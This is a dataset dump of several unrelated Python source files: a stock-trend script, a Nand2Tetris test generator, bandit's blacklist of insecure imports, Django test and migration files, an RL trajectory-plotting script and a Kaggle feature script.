Dataset schema (per-record fields and observed ranges):

| Column | Type | Range / values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3–616 |
| content_id | string | length 40 |
| detected_licenses | list | length 0–112 |
| license_type | string | 2 classes |
| repo_name | string | length 5–115 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64, nullable | 4.92k – 681M |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us], nullable | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us], nullable | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 – 10.2M |
| extension | string | 188 classes |
| content | string | length 3 – 10.2M |
| authors | list | length 1 |
| author_id | string | length 1–132 |

blob_id: d52d63f378c671167dc83b8eb693e2317905e11a | directory_id: 16ba38ef11b82e93d3b581bbff2c21e099e014c4
path: /haohaninfo/Python_Stock_Sample/Python股票技巧範例/實單範例/92.py | content_id: 50bbeb402fdbf215e5b4078a807ba1937d5bdafb
detected_licenses: [] | license_type: no_license
repo_name: penguinwang96825/Auto-Trading | branch_name: refs/heads/master
snapshot_id: cb7a5addfec71f611bdd82534b90e5219d0602dd | revision_id: a031a921dbc036681c5054f2c035f94499b95d2e
visit_date: 2022-12-24T21:25:34.835436 | revision_date: 2020-09-22T09:59:56 | committer_date: 2020-09-22T09:59:56
github_id: 292,052,986 | star_events_count: 2 | fork_events_count: 5
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 977 | extension: py
content:
# -*- coding: UTF-8 -*-
# Load the required packages
import datetime,function,indicator
import talib,numpy
import sys
# Get today's date
Date=datetime.datetime.now().strftime("%Y%m%d")
# Stock ID to place the test order for
Sid=sys.argv[1]
# Trend determination
Trend=0
TrendEndTime=datetime.datetime.strptime(Date+'09:30:00','%Y%m%d%H:%M:%S')
BSPower2= indicator.BSPower2()
for i in function.getSIDMatch(Date,Sid):
    time=datetime.datetime.strptime(Date+i[0],'%Y%m%d%H:%M:%S.%f')
    price=float(i[2])
    qty=int(i[3])
    ask=float(i[5])
    bid=float(i[6])
    BSPower2.Add(price,qty,ask,bid)
    if time > TrendEndTime:
        sig = BSPower2.Get()
        if sig[0] > sig[1]:
            print('Long trades only today')
            Trend=1
            break
        elif sig[0] < sig[1]:
            print('Short trades only today')
            Trend=-1
            break
        else:
            print('No clear trend today')
            break
authors: ["penguinwang@smail.nchu.edu.tw"] | author_id: penguinwang@smail.nchu.edu.tw
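
The script above depends on haohaninfo's proprietary `function` and `indicator` modules, so it cannot run on its own. As a self-contained illustration of the same pattern (accumulate buy/sell pressure tick by tick until a cutoff time, then commit to a direction), here is a minimal sketch; the tick feed and the pressure heuristic are stand-ins, not the real `getSIDMatch`/`BSPower2` APIs:

```python
# Minimal sketch of the trend rule above; the tick data and the
# buy/sell-pressure heuristic are assumptions, not haohaninfo's APIs.
import datetime

class BuySellPower:
    """Toy stand-in for indicator.BSPower2: tally volume at ask vs. bid."""
    def __init__(self):
        self.buy = 0.0
        self.sell = 0.0

    def add(self, price, qty, ask, bid):
        if price >= ask:    # trade lifted the offer: buying pressure
            self.buy += qty
        elif price <= bid:  # trade hit the bid: selling pressure
            self.sell += qty

    def get(self):
        return self.buy, self.sell

cutoff = datetime.time(9, 30)
ticks = [  # (time, price, qty, ask, bid), synthetic
    (datetime.time(9, 0), 100.5, 3, 100.5, 100.0),
    (datetime.time(9, 15), 100.0, 2, 100.5, 100.0),
    (datetime.time(9, 31), 101.0, 5, 101.0, 100.5),
]

power = BuySellPower()
trend = 0  # 1: long only, -1: short only, 0: unclear
for t, price, qty, ask, bid in ticks:
    power.add(price, qty, ask, bid)
    if t > cutoff:
        buy, sell = power.get()
        trend = 1 if buy > sell else (-1 if sell > buy else 0)
        break
print('trend:', trend)
```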

blob_id: 6d88d996e37554efc91b4639f8e20013073ea73d | directory_id: c55996cce55db9e15f679f2358f6782754cd7013
path: /Chips/Or4Way.py | content_id: f5668ccfe102eb722df4a89c2402a0ce45333d49
detected_licenses: ["MIT"] | license_type: permissive
repo_name: AdilRas/Nand2TetrisCaseGenerator | branch_name: refs/heads/master
snapshot_id: efc1e0d7900593f6ba47d99a43dfa1647bbc35ec | revision_id: db82e6988d03d64884e4ac0cf02cecb78e275bc5
visit_date: 2021-01-15T02:58:23.552602 | revision_date: 2020-02-26T19:14:39 | committer_date: 2020-02-26T19:14:39
github_id: 242,856,705 | star_events_count: 6 | fork_events_count: 2
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 404 | extension: py
content:
from src.TestCaseGenerator import *

input_variables = [Var("a", 4, "B"), Var("b", 4, "B")]
output_variables = [Var("out", 1, "B")]

# args = [a, b]; out is 1 when any bit of the first input is set
def or4way_logic(args):
    a = args[0]
    out = []
    if a > 0:
        out.append(1)
    else:
        out.append(0)
    return out

generate(name="Or4Way", numCases=10, inVars=input_variables, outVars=output_variables, function=or4way_logic)
authors: ["="] | author_id: =
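
`src.TestCaseGenerator` is specific to this repository, so `Var` and `generate` are not runnable here. A minimal sketch of what such a generator does (draw random fixed-width inputs, compute expected outputs from the chip logic); every name below is a hypothetical stand-in, not the project's implementation:

```python
# Hypothetical stand-in for the project's generate(): prints random
# test cases as (inputs -> expected output) pairs.
import random

def or4way_logic(args):
    # 4-way OR: 1 if any bit of the first input is set
    return [1 if args[0] > 0 else 0]

def generate_cases(num_cases, bit_width=4, seed=0):
    rng = random.Random(seed)
    for _ in range(num_cases):
        a = rng.randrange(2 ** bit_width)
        b = rng.randrange(2 ** bit_width)
        out = or4way_logic([a, b])
        print(f"a={a:0{bit_width}b} b={b:0{bit_width}b} -> out={out[0]}")

generate_cases(10)
```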

blob_id: 7d76e9723c180800261a081ff6dd9421815fd365 | directory_id: 8eff2593ef44b3bdb8dda8678eb051e58b4b5129
path: /myenv/lib/python3.5/site-packages/bandit/blacklists/imports.py | content_id: 833e18153633ce3c197b18bdf098fe97c8670f76
detected_licenses: ["MIT"] | license_type: permissive
repo_name: rupeshparab/techscan | branch_name: refs/heads/master
snapshot_id: 08391c26c7916dd397527e1da8f91b4aa78bc96e | revision_id: ce2558602ddad31873d7129f25b1cc61895b9939
visit_date: 2022-12-11T03:33:07.533280 | revision_date: 2017-09-03T17:48:57 | committer_date: 2017-09-03T17:48:57
github_id: 102,280,759 | star_events_count: 1 | fork_events_count: 1
gha_license_id: MIT | gha_event_created_at: 2022-12-08T00:36:08 | gha_created_at: 2017-09-03T17:11:16 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 12,232 | extension: py
content:
# -*- coding:utf-8 -*-
#
# Copyright 2016 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
r"""
======================================================
Blacklist various Python imports known to be dangerous
======================================================
This blacklist data checks for a number of Python modules known to have
possible security implications. The following blacklist tests are run against
any import statements or calls encountered in the scanned code base.
Note that the XML rules listed here are mostly based off of Christian Heimes'
work on defusedxml: https://pypi.python.org/pypi/defusedxml
B401: import_telnetlib
----------------------
A telnet-related module is being imported. Telnet is considered insecure. Use
SSH or some other encrypted protocol.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B401 | import_telnetlib | - telnetlib | high |
+------+---------------------+------------------------------------+-----------+
B402: import_ftplib
-------------------
A FTP-related module is being imported. FTP is considered insecure. Use
SSH/SFTP/SCP or some other encrypted protocol.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B402 | import_ftplib       | - ftplib                           | high      |
+------+---------------------+------------------------------------+-----------+
B403: import_pickle
-------------------
Consider possible security implications associated with these modules.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B403 | import_pickle | - pickle | low |
| | | - cPickle | |
+------+---------------------+------------------------------------+-----------+
B404: import_subprocess
-----------------------
Consider possible security implications associated with these modules.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B404 | import_subprocess | - subprocess | low |
+------+---------------------+------------------------------------+-----------+
B405: import_xml_etree
----------------------
Using various methods to parse untrusted XML data is known to be vulnerable to
XML attacks. Replace vulnerable imports with the equivalent defusedxml package,
or make sure defusedxml.defuse_stdlib() is called.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B405 | import_xml_etree | - xml.etree.cElementTree | low |
| | | - xml.etree.ElementTree | |
+------+---------------------+------------------------------------+-----------+
B406: import_xml_sax
--------------------
Using various methods to parse untrusted XML data is known to be vulnerable to
XML attacks. Replace vulnerable imports with the equivalent defusedxml package,
or make sure defusedxml.defuse_stdlib() is called.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B406 | import_xml_sax | - xml.sax | low |
+------+---------------------+------------------------------------+-----------+
B407: import_xml_expat
----------------------
Using various methods to parse untrusted XML data is known to be vulnerable to
XML attacks. Replace vulnerable imports with the equivalent defusedxml package,
or make sure defusedxml.defuse_stdlib() is called.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B407 | import_xml_expat | - xml.dom.expatbuilder | low |
+------+---------------------+------------------------------------+-----------+
B408: import_xml_minidom
------------------------
Using various methods to parse untrusted XML data is known to be vulnerable to
XML attacks. Replace vulnerable imports with the equivalent defusedxml package,
or make sure defusedxml.defuse_stdlib() is called.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B408 | import_xml_minidom | - xml.dom.minidom | low |
+------+---------------------+------------------------------------+-----------+
B409: import_xml_pulldom
------------------------
Using various methods to parse untrusted XML data is known to be vulnerable to
XML attacks. Replace vulnerable imports with the equivalent defusedxml package,
or make sure defusedxml.defuse_stdlib() is called.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B409 | import_xml_pulldom | - xml.dom.pulldom | low |
+------+---------------------+------------------------------------+-----------+
B410: import_lxml
-----------------
Using various methods to parse untrusted XML data is known to be vulnerable to
XML attacks. Replace vulnerable imports with the equivalent defusedxml package.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B410 | import_lxml | - lxml | low |
+------+---------------------+------------------------------------+-----------+
B411: import_xmlrpclib
----------------------
XMLRPC is particularly dangerous as it is also concerned with communicating
data over a network. Use defused.xmlrpc.monkey_patch() function to monkey-patch
xmlrpclib and mitigate remote XML attacks.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B411 | import_xmlrpclib | - xmlrpclib | high |
+------+---------------------+------------------------------------+-----------+
B412: import_httpoxy
--------------------
httpoxy is a set of vulnerabilities that affect application code running in
CGI, or CGI-like environments. The use of CGI for web applications should be
avoided to prevent this class of attack. More details are available
at https://httpoxy.org/.
+------+---------------------+------------------------------------+-----------+
| ID | Name | Imports | Severity |
+======+=====================+====================================+===========+
| B412 | import_httpoxy | - wsgiref.handlers.CGIHandler | high |
| | | - twisted.web.twcgi.CGIScript | |
+------+---------------------+------------------------------------+-----------+
"""
from bandit.blacklists import utils


def gen_blacklist():
    """Generate a list of items to blacklist.

    Methods of this type, "bandit.blacklist" plugins, are used to build a list
    of items that bandit's built in blacklisting tests will use to trigger
    issues. They replace the older blacklist* test plugins and allow
    blacklisted items to have a unique bandit ID for filtering and profile
    usage.

    :return: a dictionary mapping node types to a list of blacklist data
    """
    sets = []
    sets.append(utils.build_conf_dict(
        'import_telnetlib', 'B401', ['telnetlib'],
        'A telnet-related module is being imported. Telnet is '
        'considered insecure. Use SSH or some other encrypted protocol.',
        'HIGH'
    ))
    sets.append(utils.build_conf_dict(
        'import_ftplib', 'B402', ['ftplib'],
        'A FTP-related module is being imported. FTP is considered '
        'insecure. Use SSH/SFTP/SCP or some other encrypted protocol.',
        'HIGH'
    ))
    sets.append(utils.build_conf_dict(
        'import_pickle', 'B403', ['pickle', 'cPickle'],
        'Consider possible security implications associated with '
        '{name} module.', 'LOW'
    ))
    sets.append(utils.build_conf_dict(
        'import_subprocess', 'B404', ['subprocess'],
        'Consider possible security implications associated with '
        '{name} module.', 'LOW'
    ))

    # Most of this is based off of Christian Heimes' work on defusedxml:
    # https://pypi.python.org/pypi/defusedxml/#defusedxml-sax
    xml_msg = ('Using {name} to parse untrusted XML data is known to be '
               'vulnerable to XML attacks. Replace {name} with the equivalent '
               'defusedxml package, or make sure defusedxml.defuse_stdlib() '
               'is called.')
    lxml_msg = ('Using {name} to parse untrusted XML data is known to be '
                'vulnerable to XML attacks. Replace {name} with the '
                'equivalent defusedxml package.')

    sets.append(utils.build_conf_dict(
        'import_xml_etree', 'B405',
        ['xml.etree.cElementTree', 'xml.etree.ElementTree'], xml_msg, 'LOW'))
    sets.append(utils.build_conf_dict(
        'import_xml_sax', 'B406', ['xml.sax'], xml_msg, 'LOW'))
    sets.append(utils.build_conf_dict(
        'import_xml_expat', 'B407', ['xml.dom.expatbuilder'], xml_msg, 'LOW'))
    sets.append(utils.build_conf_dict(
        'import_xml_minidom', 'B408', ['xml.dom.minidom'], xml_msg, 'LOW'))
    sets.append(utils.build_conf_dict(
        'import_xml_pulldom', 'B409', ['xml.dom.pulldom'], xml_msg, 'LOW'))
    sets.append(utils.build_conf_dict(
        'import_lxml', 'B410', ['lxml'], lxml_msg, 'LOW'))
    sets.append(utils.build_conf_dict(
        'import_xmlrpclib', 'B411', ['xmlrpclib'],
        'Using {name} to parse untrusted XML data is known to be '
        'vulnerable to XML attacks. Use defused.xmlrpc.monkey_patch() '
        'function to monkey-patch xmlrpclib and mitigate XML '
        'vulnerabilities.', 'HIGH'))
    sets.append(utils.build_conf_dict(
        'import_httpoxy', 'B412',
        ['wsgiref.handlers.CGIHandler', 'twisted.web.twcgi.CGIScript',
         'twisted.web.twcgi.CGIDirectory'],
        'Consider possible security implications associated with '
        '{name} module.', 'HIGH'
    ))

    return {'Import': sets, 'ImportFrom': sets, 'Call': sets}
authors: ["rupeshparab.rp@gmail.com"] | author_id: rupeshparab.rp@gmail.com
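
The module above only declares blacklist data; bandit's own checkers consume it when visiting import nodes. As a self-contained illustration of the underlying technique (not bandit's actual implementation), a few lines of the standard `ast` module suffice to flag blacklisted imports:

```python
# Minimal sketch of import blacklisting with the standard ast module.
# The rule set mirrors a few entries above; bandit's real checker is richer.
import ast

BLACKLIST = {
    'telnetlib': ('B401', 'HIGH'),
    'ftplib': ('B402', 'HIGH'),
    'pickle': ('B403', 'LOW'),
    'subprocess': ('B404', 'LOW'),
    'xml.sax': ('B406', 'LOW'),
}

def check(source):
    findings = []
    for node in ast.walk(ast.parse(source)):
        names = []
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom) and node.module:
            names = [node.module]
        for name in names:
            if name in BLACKLIST:
                bid, severity = BLACKLIST[name]
                findings.append((bid, severity, name, node.lineno))
    return findings

print(check("import telnetlib\nfrom xml.sax import make_parser\n"))
# [('B401', 'HIGH', 'telnetlib', 1), ('B406', 'LOW', 'xml.sax', 2)]
```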

blob_id: 937bcf121e3fd1140f67af8b53050b8cfd8c62b3 | directory_id: 6f8113e7a06699e8448dcbeb7c329be11c5926a5
path: /apps/facebook/tests/urls.py | content_id: d86907b4cb8b7bf2049a0dc4ec2fde70619b8531
detected_licenses: ["MIT", "BSD-3-Clause"] | license_type: permissive
repo_name: groovecoder/affiliates | branch_name: refs/heads/master
snapshot_id: b906a565f3f035da09e22b15e9843b1aed7b313d | revision_id: 7d22304ada7ffdb893fe8305630ec11eb84cfab5
visit_date: 2020-04-06T04:36:09.980997 | revision_date: 2014-01-10T15:07:16 | committer_date: 2014-01-10T15:07:59
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 657 | extension: py
content:
import os

from django.conf.urls.defaults import include, patterns, url
from django.http import HttpResponse
from django.template import RequestContext

from funfactory.manage import ROOT
from jingo import env


def base_template_view(request):
    template = env.from_string("""
        {% extends 'facebook/base.html' %}
        {% block content %}test{% endblock %}
    """)
    return HttpResponse(template.render(RequestContext(request)))


urlpatterns = patterns('',
    # Include base urls to avoid NoReverseMatch errors.
    (r'', include('%s.urls' % os.path.basename(ROOT))),

    url('^fb/test$', base_template_view, name='facebook.base_test'),
)
authors: ["mkelly@mozilla.com"] | author_id: mkelly@mozilla.com

blob_id: 4ca89110e5367a6b1a354bffa4531ba99188ae58 | directory_id: 1866d40b66fe6b0291f96a3c5eec1fbd9e1aee88
path: /tests/_testsite/apps/forum_conversation/migrations/0011_topic_dummy.py | content_id: 0461c28d62f0db1a5b5769bb4f9088406f135caa
detected_licenses: ["BSD-3-Clause"] | license_type: permissive
repo_name: ellmetha/django-machina | branch_name: refs/heads/main
snapshot_id: f612ea0d1191001f8188fe868ddec69ec530b4d7 | revision_id: 6586d2608bbffc31911ea6f9a15c570580116238
visit_date: 2023-07-31T18:11:28.819165 | revision_date: 2023-05-28T01:19:33 | committer_date: 2023-05-28T01:19:33
github_id: 14,761,593 | star_events_count: 640 | fork_events_count: 174
gha_license_id: BSD-3-Clause | gha_event_created_at: 2023-07-25T23:20:46 | gha_created_at: 2013-11-27T23:12:41 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 468 | extension: py
content:
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations


class Migration(migrations.Migration):

    dependencies = [
        ('forum_conversation', '0010_auto_20170120_0224'),
    ]

    operations = [
        migrations.AddField(
            model_name='topic',
            name='dummy',
            field=models.CharField(max_length=128, null=True, blank=True),
            preserve_default=True,
        ),
    ]
authors: ["morgan.aubert@zoho.com"] | author_id: morgan.aubert@zoho.com

blob_id: 28c1ab842c0df1278993d803b17abeb1dccb5a46 | directory_id: c7295c1ffd8ad82c273524eab1a42d3a22741ba9
path: /figures/third/trajectories.py | content_id: f4fa229790815bcdc4bc3dab6420f4162a41887e
detected_licenses: [] | license_type: no_license
repo_name: FedeClaudi/EscapePathSelection | branch_name: refs/heads/master
snapshot_id: 629d3ea6f5c14af144bdda16a899b3fb86340169 | revision_id: 1bbdd95384e1c343495fcf33fc0c46b21110fe91
visit_date: 2023-04-18T18:16:27.153848 | revision_date: 2022-04-25T12:20:40 | committer_date: 2022-04-25T12:20:40
github_id: 247,850,434 | star_events_count: 1 | fork_events_count: 1
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 6,430 | extension: py
content:
# %%
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from loguru import logger
import matplotlib as mpl
from mpl_toolkits.axes_grid1 import make_axes_locatable

from fcutils.plot.figure import clean_axes
from fcutils.plot.elements import plot_mean_and_error
from fcutils.maths import rolling_mean

import sys
from pathlib import Path
import os

module_path = Path(os.path.abspath(os.path.join("."))).parent.parent
sys.path.append(str(module_path))
sys.path.append('./')

from figures.third import MODELS_COLORS, MODELS, MAZES, fig_3_path
from figures.settings import dpi
from figures.third import PsychometricM1, PsychometricM6, QTableModel, DynaQModel, InfluenceZones, Status, QTableTracking, DynaQTracking, InfluenceZonesTracking
from figures.third.settings import TRAINING_SETTINGS, RANDOM_INIT_POS, REWARDS
from figures.settings import dpi

'''
Plot the escape trajectories of trained agents
'''

# %%
logger.remove()
logger.add(sys.stdout, level='INFO')

# -------------------------------- parameters -------------------------------- #
# change training settings to reflect parameters
TRAINING_SETTINGS['episodes'] = 250
TRAINING_SETTINGS['max_n_steps'] = 500

# def plot_maze(states_counts, name, exploration):
#     norm = mpl.colors.LogNorm(vmin=0, vmax=500)
#     f, ax = plt.subplots()
#     ax.scatter(
#         [k[0] for k, v in states_counts.items() if v > 0],
#         [k[1] for k, v in states_counts.items() if v > 0],
#         c=[v for v in states_counts.values() if v > 0],
#         vmin=1, vmax=500, cmap='bwr', lw=1, edgecolors=['k'], marker='s', s=65, norm=norm,
#     )
#     ax.set(ylim=[50, 0], title=name + ' ' + exploration)
#     ax.axis('equal')
#     ax.axis('off')
#     divider = make_axes_locatable(ax)
#     cax = divider.append_axes('right', size='5%', pad=0.1)
#     cmap = mpl.cm.bwr
#     # norm = mpl.colors.Normalize(vmin=1, vmax=500)
#     f.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),
#                cax=cax, orientation='vertical', label='# visits')
#     f.savefig(fig_3_path / f'{name}_{exploration}_exploration_occupancy.eps', format='eps', dpi=dpi)

# %%
# ---------------------------------------------------------------------------- #
#                                  FREE EXPL                                   #
# ---------------------------------------------------------------------------- #

def plot(agent, trajectories, name, exploration):
    f, ax = plt.subplots(figsize=(9, 9))

    for traj in trajectories:
        ax.plot([s[0] for s in traj], [s[1] for s in traj], color='w', lw=8, zorder=1)
        ax.plot([s[0] for s in traj], [s[1] for s in traj], color='r', lw=6, zorder=2)

    # draw maze
    x, y = np.where(agent.environment.maze == 0)[::-1]
    ax.scatter(
        x,
        y,
        color=[.8, .8, .8],
        lw=1, edgecolors=['k'], marker='s', s=250, zorder=-1
    )

    ax.set(ylim=[50, 0], title=name)
    ax.axis('equal')
    ax.axis('off')
    f.savefig(fig_3_path / f'{name}_{exploration}_escape_trajectories.eps', format='eps', dpi=dpi)

agents = {
    # 'QTable': QTableModel,
    # 'DynaQ_20': DynaQModel,
    'InfluenceZonesNoSheltVec': InfluenceZones,
}
agent_kwargs = {
    'QTable': dict(learning_rate=.9, penalty_move=1e-8),
    'DynaQ_20': dict(n_planning_steps=20),
    'InfluenceZonesNoSheltVec': dict(predict_with_shelter_vector=False, learning_rate=.2, discount=.8),
}

maze = PsychometricM1
for n, (name, model) in enumerate(agents.items()):
    trajectories = []
    for i in range(3):
        logger.info(f'training agent: {name}')

        # remove duplicate parameters
        settings = TRAINING_SETTINGS.copy()
        rewards = REWARDS.copy()
        for param in agent_kwargs[name].keys():
            if param in settings.keys():
                # print(f'[dim]Overriding default settings value for {param}')
                del settings[param]
            # adjust rewards per model
            if param in rewards.keys():
                # print(f'[dim]Overriding default reward value for {param}')
                rewards[param] = agent_kwargs[name][param]

        # create an instance
        _maze = maze(rewards)
        _maze.build_graph()
        _maze.shelter_found = False
        agent = model(_maze, name=_maze.name, **settings, **agent_kwargs[name])

        # train
        agent.train(random_start=RANDOM_INIT_POS, episodes=TRAINING_SETTINGS['episodes'], test_performance=True)

        # test
        status, play_steps, play_reward, escape_arm, states = _maze.play(agent, start_cell=_maze.START)
        trajectories.append(states)

    # draw trajectories
    plot(agent, trajectories, name, 'free')

# %%
# %%
# ---------------------------------------------------------------------------- #
#                                 GUIDED EXPL                                  #
# ---------------------------------------------------------------------------- #
sessions = [36, 24, 25]
agents = {
    'QTable': QTableTracking,
    'DynaQ_20': DynaQTracking,
    'InfluenceZonesNoSheltVec': InfluenceZonesTracking,
}
agent_kwargs = {
    'QTable': dict(learning_rate=.9),
    'DynaQ_20': dict(n_planning_steps=20),
    'InfluenceZonesNoSheltVec': dict(predict_with_shelter_vector=False, learning_rate=.2, discount=.8),
}

# iterate over mazes and models
for name, model in agents.items():
    # agent specific settings
    agent_settings = TRAINING_SETTINGS.copy()
    agent_rewards = REWARDS.copy()
    for param in agent_kwargs[name].keys():
        if param in agent_settings.keys():
            del agent_settings[param]
        # adjust rewards per model
        if param in agent_rewards.keys():
            agent_rewards[param] = agent_kwargs[name][param]

    # iterate over trials
    trajectories = []
    for session_number in sessions:
        # instantiate model and maze
        _maze = maze(agent_rewards)
        _model = model(
            _maze,
            'M1',
            take_all_actions=False,
            trial_number=session_number,
            name=_maze.name,
            **agent_settings, **agent_kwargs[name])

        # train
        _model.train(film=False)

        # test
        status, play_steps, play_reward, escape_arm, states = _maze.play(_model, start_cell=_maze.START)
        trajectories.append(states)

    plot(_model, trajectories, name, 'guided')

# %%
authors: ["federicoclaudi@protonmail.com"] | author_id: federicoclaudi@protonmail.com
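
Both halves of the script repeat the same override logic: any agent-specific kwarg removes the matching key from the shared training settings, and kwargs that name a reward overwrite the default reward. A hypothetical helper (not from the repository) makes the pattern explicit:

```python
# Hypothetical helper capturing the override pattern used twice above:
# agent kwargs shadow shared training settings, and kwargs that name a
# reward replace the default reward value.
def split_overrides(base_settings, base_rewards, agent_kwargs):
    settings = {k: v for k, v in base_settings.items() if k not in agent_kwargs}
    rewards = dict(base_rewards)
    for param, value in agent_kwargs.items():
        if param in rewards:
            rewards[param] = value
    return settings, rewards

# Example with stand-in dictionaries (not the repo's real settings):
TRAINING = {'episodes': 250, 'max_n_steps': 500, 'learning_rate': 0.5}
REWARDS = {'step': -0.01, 'discount': 0.9}
kwargs = {'learning_rate': 0.2, 'discount': 0.8}

settings, rewards = split_overrides(TRAINING, REWARDS, kwargs)
print(settings)  # {'episodes': 250, 'max_n_steps': 500}
print(rewards)   # {'step': -0.01, 'discount': 0.8}
```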

blob_id: 8ed056e6cedb9357097a5fd5b51a47b4610ce6ae | directory_id: 8f6cc0e8bd15067f1d9161a4b178383e62377bc7
path: /kaggle_song_git/code_box/VALIDATION_fake_feature_insert_V1001/report/0.687954one_train_V1003.py | content_id: 5e8ec3aab8083acb97a86c9b41a530c4981ac756
detected_licenses: [] | license_type: no_license
repo_name: humorbeing/python_github | branch_name: refs/heads/master
snapshot_id: 9c4dfc61a3cefbb266fefff335f6b28d05797e5e | revision_id: e4b4b49bee7e7e3843c6874717779ce8d619bd02
visit_date: 2023-01-22T21:51:20.193131 | revision_date: 2020-01-26T21:47:23 | committer_date: 2020-01-26T21:47:23
github_id: 163,707,778 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: 2022-12-27T15:37:48 | gha_created_at: 2019-01-01T01:58:18 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 8,077 | extension: py
content:
import numpy as np
import pandas as pd
import lightgbm as lgb
import datetime
import math
import gc
import time
import pickle
from sklearn.model_selection import train_test_split
since = time.time()
data_dir = '../data/'
save_dir = '../saves/'
load_name = 'train_set'
dt = pickle.load(open(save_dir+load_name+'_dict.save', "rb"))
df = pd.read_csv(save_dir+load_name+".csv", dtype=dt)
del dt
# barebone = True
barebone = False
if barebone:
    ccc = [i for i in df.columns]
    ccc.remove('target')
    df.drop(ccc, axis=1, inplace=True)

# must be a fake feature
inner = [
    'FAKE_[]_0.6788_Light_gbdt_1512883008.csv'
]
inner = False

def insert_this(on):
    global df
    on = on[:-4]
    df1 = pd.read_csv('../saves/feature/'+on+'.csv')
    df1.drop('id', axis=1, inplace=True)
    on = on[-10:]
    df1.rename(columns={'target': 'FAKE_'+on}, inplace=True)
    df = df.join(df1)
    del df1

cc = df.drop('target', axis=1)
# print(cc.dtypes)
cols = cc.columns
del cc

counter = {}

def get_count(x):
    try:
        return counter[x]
    except KeyError:
        return 0

def add_this_counter_column(on_in):
    global counter, df
    read_from = '../fake/saves/'
    counter = pickle.load(open(read_from+'counter/'+'ITC_'+on_in+'_dict.save', "rb"))
    df['ITC_'+on_in] = df[on_in].apply(get_count).astype(np.int64)
    # counter = pickle.load(open(read_from + 'counter/' + 'CC11_' + on_in + '_dict.save', "rb"))
    # df['CC11_' + on_in] = df[on_in].apply(get_count).astype(np.int64)
    # df.drop(on_in, axis=1, inplace=True)

for col in cols:
    print("'{}',".format(col))
    # add_this_counter_column(col)

cols = ['song_id', 'msno']
for col in cols:
    # print("'{}',".format(col))
    add_this_counter_column(col)

def log10me(x):
    return np.log10(x)

def log10me1(x):
    return np.log10(x+1)

def xxx(x):
    d = x / (x + 1)
    return d  # was `return x`, which discarded the computed ratio

for col in cols:
    colc = 'ITC_'+col
    # df[colc + '_log10'] = df[colc].apply(log10me).astype(np.float64)
    df[colc + '_log10_1'] = df[colc].apply(log10me1).astype(np.float64)
    # df[colc + '_x_1'] = df[colc].apply(xxx).astype(np.float64)
    # col1 = 'CC11_'+col
    # df['OinC_'+col] = df[col1]/df[colc]
    # df.drop(colc, axis=1, inplace=True)
# load_name = 'train_set'
# read_from = '../saves01/'
# dt = pickle.load(open(read_from+load_name+'_dict.save', "rb"))
# train = pd.read_csv(read_from+load_name+".csv", dtype=dt)
# del dt
#
# train.drop(
# [
# 'target',
# ],
# axis=1,
# inplace=True
# )
#
# df = df.join(train)
# del train
if inner:
    for i in inner:
        insert_this(i)
print('What we got:')
print(df.dtypes)
print('number of rows:', len(df))
